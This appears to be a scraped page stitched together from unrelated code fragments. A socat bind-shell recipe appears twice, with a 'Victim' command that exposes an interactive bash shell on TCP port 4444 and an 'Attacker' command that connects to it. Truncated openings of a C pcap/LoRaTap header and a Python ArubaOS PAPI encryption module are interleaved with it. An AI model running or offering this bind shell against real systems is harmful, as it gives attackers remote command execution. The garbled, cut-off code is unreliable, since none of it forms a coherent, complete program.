socat bind shell
Victim
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
Attacker
socat -,raw,echo=0 tcp:127.0.0.1:4444
#include "loratap.h" | |
#include <string.h> | |
#include <stdio.h> | |
#include <arpa/inet.h> | |
#define LINKTYPE_LORA_LORATAP 270 | |
typedef struct pcap_hdr_s { | |
uint32_t magic_number; /* magic number */ | |
uint16_t version_major; /* major version number */ |
socat bind shell
Victim
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
Attacker
socat -,raw,echo=0 tcp:127.0.0.1:4444
import hashlib | |
from struct import * | |
""" | |
This implementation was reverse engineered using Wireshark (and source code), strace and two excellent articles: | |
- https://x-c3ll.github.io/posts/CVE-2018-7081-RCE-ArubaOS/ | |
- https://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html | |
""" | |
def papi_encrypt(data): |